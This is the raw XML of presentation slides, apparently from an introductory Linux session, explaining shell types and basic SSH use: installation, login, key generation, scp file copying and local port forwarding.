              <a:t>’  or the ‘Bourne Shell’ shell was written by Steve Bourne at AT&amp;T Bell Labs and is the original UNIX shell. Sh tends to lack interactive features such as previous commands or tab completion, along with some other useful features that other shells such as bash incorporate. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BASH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>shell or ‘GNU Bourne-Again Shell’ is a more modern shell that is based off of the ‘sh’ shell however also incorporates features from the ‘ksh’ shell. This is the shell that is most commonly used when you open up a terminal on a modern Linux OS. It incorporates more interactive features such as tab completion and a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>There are also other shells such as the C Shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>csh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>) that incorporates some arithmetic and C-like expression syntax. The Korn Shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>) was created by David Korn from AT&amp;T Bell Labs and had features baked into the BASH shell.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>You can see all shells you can use in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/shells</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p16"/>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Some shells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Shells allow us to run commands on a computer, therefore given the correct permissions we can basically do anything we want on the computer.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Some basic things from our previous introduction to Linux session shows us that we can search for files and data using the find command, we can make files, view files, start some services, interact with local databases etc…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>So I guess you can see the importance of having a shell right? It opens up a wide range of things that we can do on the computer.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>But shells are typically local, how can we use shells if we are not on the local computer?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p17"/>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What can we do in a shell?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SSH is a common tool for giving remote access to an operating system. It’s widely used in Linux to allow people to securely connect to a remote computer and issue commands for the remote computer to run. Let’s setup SSH on our machine!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo apt-get upgrade</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo apt-get install openssh-client</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo apt-get install openssh-server</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>ps -A | grep sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> - This should show the SSH service running</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Now we can try logging into the ssh server using:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>sh [username]@[IPv4 address]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>ssh [username]@[IPv6 address]%[interface]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>We can play around with the ssh config settings in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/ssh/sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>PermitRootLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="2B303B"/>
                </a:highlight>
              </a:rPr>
              <a:t>AllowTcpForwarding</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="2B303B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p18"/>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SSH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Public and private SSH keys are a way of authenticating using SSH - They are a better way of authenticating who you are instead of just a password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The private key allows us to decrypt data that the public key can encrypt, meaning if we give the SSH server we want to connect to our public key we can allow them to encrypt messages to us, therefore allowing us to validate who we are.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT SHARE YOUR PRIVATE KEYS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> - This allows people to impersonate you, giving them access</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>You can generate your own SSH keys for use in SSH via this command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh-keygen -t rsa -f id_rsa -P "[identifier for key]"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hmod 600 id_rsa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This generates us a public/private key that we can use to authenticate when connecting to a SSH server (It can also be used for things like Git)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p19"/>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Public/Private keys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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="4128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What sort of other things can SSH allow us to do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Securely copy files over to the remote machine using SCP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Local -&gt; Remote: scp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/shells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sesh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.186.138</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/sesh/remote_shells.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remote -&gt; Local: scp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sesh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.186.138</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/shells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /home/mole/remote_shells.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Port forwarding - This allows us to send traffic from one port to a remote server, useful for when there is a remote server that is running an application that you cannot access. You can simply forward the port to your own device so that it looks like a ‘local’ port on your own network. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.ssh.com/ssh/tunneling/example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ssh -L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sesh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.186.138</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> is the local port to send the data to</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> is the remote port to forward the data from</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.186.138</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> is the ip of the remote server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>-N can be used so that you don’t get a shell, only forward the port</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>There are more examples than just this one, check them out for yourself!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p20"/>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Cool, we can now SSH!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850250" y="857250"/>
            <a:ext cx="9180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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Key:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Google Shape;109;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210000" y="3232826"/>
            <a:ext cx="2682350" cy="1134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